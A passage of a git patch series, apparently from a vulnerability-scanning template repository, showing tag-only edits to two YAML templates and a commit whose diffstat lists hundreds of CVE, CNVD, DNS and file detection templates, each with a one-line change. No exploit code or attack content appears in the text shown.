a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index 38ab6d4316..98392302e7 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -20,7 +20,7 @@ info: metadata: max-request: 3 verified: true - tags: cve,cve2021,elfinder,upload,rce,intrusive + tags: cve,cve2021,elfinder,fileupload,rce,intrusive http: - raw: diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index b8951767aa..5d6128a5e3 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -13,7 +13,7 @@ info: max-request: 4 verified: true google-query: intitle:"Roxy file manager" - tags: tech,fileupload,roxy,fileman,panel + tags: tech,roxy,fileman,panel http: - method: GET From 75ed2753281c5924e7f507b6a18708d7f3ec4b4f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 5 Jul 2023 13:37:58 +0530 Subject: [PATCH 390/609] removed enhanced by comments --- dns/azure-takeover-detection.yaml | 2 +- dns/detect-dangling-cname.yaml | 2 +- dns/dmarc-detect.yaml | 2 +- dns/dns-waf-detect.yaml | 2 +- dns/dnssec-detection.yaml | 2 +- dns/ec2-detection.yaml | 2 +- dns/elasticbeantalk-takeover.yaml | 2 +- dns/mx-fingerprint.yaml | 2 +- dns/mx-service-detector.yaml | 2 +- dns/nameserver-fingerprint.yaml | 2 +- dns/ptr-fingerprint.yaml | 2 +- dns/servfail-refused-hosts.yaml | 2 +- dns/spoofable-spf-records-ptr.yaml | 2 +- dns/txt-fingerprint.yaml | 2 +- dns/worksites-detection.yaml | 2 +- file/android/adb-backup-enabled.yaml | 2 +- file/electron/node-integration-enabled.yaml | 2 +- file/logs/python-app-sql-exceptions.yaml | 2 +- file/logs/suspicious-sql-error-messages.yaml | 2 +- file/xss/dom-xss.yaml | 2 +- headless/headless-open-redirect.yaml | 2 +- headless/window-name-domxss.yaml | 2 +- http/cnvd/2018/CNVD-2018-13393.yaml | 2 +- http/cnvd/2019/CNVD-2019-01348.yaml | 2 +- http/cnvd/2019/CNVD-2019-06255.yaml | 2 +- http/cnvd/2019/CNVD-2019-19299.yaml | 2 +- http/cnvd/2019/CNVD-2019-32204.yaml | 2 +- http/cnvd/2020/CNVD-2020-23735.yaml | 2 +- http/cnvd/2020/CNVD-2020-26585.yaml | 2 +- http/cnvd/2020/CNVD-2020-46552.yaml | 2 +- http/cnvd/2020/CNVD-2020-56167.yaml | 2 +- http/cnvd/2020/CNVD-2020-62422.yaml | 2 +- http/cnvd/2020/CNVD-2020-67113.yaml | 2 +- http/cnvd/2020/CNVD-2020-68596.yaml | 2 +- http/cnvd/2021/CNVD-2021-01931.yaml | 2 +- http/cnvd/2021/CNVD-2021-09650.yaml | 2 +- http/cnvd/2021/CNVD-2021-10543.yaml | 2 +- http/cnvd/2021/CNVD-2021-14536.yaml | 2 +- http/cnvd/2021/CNVD-2021-15822.yaml | 2 +- http/cnvd/2021/CNVD-2021-15824.yaml | 2 +- http/cnvd/2021/CNVD-2021-17369.yaml | 2 +- http/cnvd/2021/CNVD-2021-26422.yaml | 2 +- http/cnvd/2021/CNVD-2021-28277.yaml | 2 +- http/cnvd/2021/CNVD-2021-30167.yaml | 2 +- http/cnvd/2021/CNVD-2021-49104.yaml | 2 +- http/cnvd/2022/CNVD-2022-03672.yaml | 2 +- http/cnvd/2022/CNVD-2022-42853.yaml | 2 +- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6080.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-0932.yaml | 2 +- http/cves/2009/CVE-2009-1151.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0157.yaml | 2 +- http/cves/2010/CVE-2010-0219.yaml | 2 +- http/cves/2010/CVE-2010-0467.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1081.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1305.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1345.yaml | 2 +- http/cves/2010/CVE-2010-1352.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1354.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1470.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1472.yaml | 2 +- http/cves/2010/CVE-2010-1473.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1491.yaml | 2 +- http/cves/2010/CVE-2010-1494.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1531.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1534.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1653.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1658.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1858.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1953.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1980.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1982.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2128.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-2920.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4282.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4769.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2010/CVE-2010-5278.yaml | 2 +- http/cves/2010/CVE-2010-5286.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-2780.yaml | 2 +- http/cves/2011/CVE-2011-3315.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5265.yaml | 2 +- http/cves/2012/CVE-2012-0392.yaml | 2 +- http/cves/2012/CVE-2012-0394.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-2371.yaml | 2 +- http/cves/2012/CVE-2012-3153.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4253.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4940.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2248.yaml | 2 +- http/cves/2013/CVE-2013-2251.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5528.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7091.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-10037.yaml | 2 +- http/cves/2014/CVE-2014-1203.yaml | 2 +- http/cves/2014/CVE-2014-2321.yaml | 2 +- http/cves/2014/CVE-2014-2323.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9609.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 2 +- http/cves/2015/CVE-2015-1000010.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 2 +- http/cves/2015/CVE-2015-1503.yaml | 2 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 2 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7297.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 2 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 2 +- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10956.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3081.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-6601.yaml | 2 +- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 2 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000170.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 2 +- http/cves/2017/CVE-2017-12542.yaml | 2 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12629.yaml | 2 +- http/cves/2017/CVE-2017-12635.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14537.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-15944.yaml | 2 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5487.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 2 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 2 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 2 +- http/cves/2017/CVE-2017-9805.yaml | 2 +- http/cves/2017/CVE-2017-9822.yaml | 2 +- http/cves/2017/CVE-2017-9833.yaml | 2 +- http/cves/2017/CVE-2017-9841.yaml | 2 +- http/cves/2018/CVE-2018-0127.yaml | 2 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 2 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-10818.yaml | 2 +- http/cves/2018/CVE-2018-10822.yaml | 2 +- http/cves/2018/CVE-2018-10823.yaml | 2 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 2 +- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 2 +- http/cves/2018/CVE-2018-13379.yaml | 2 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14064.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14728.yaml | 2 +- http/cves/2018/CVE-2018-14912.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 2 +- http/cves/2018/CVE-2018-15961.yaml | 2 +- http/cves/2018/CVE-2018-16059.yaml | 2 +- http/cves/2018/CVE-2018-16133.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 2 +- http/cves/2018/CVE-2018-16283.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16341.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- 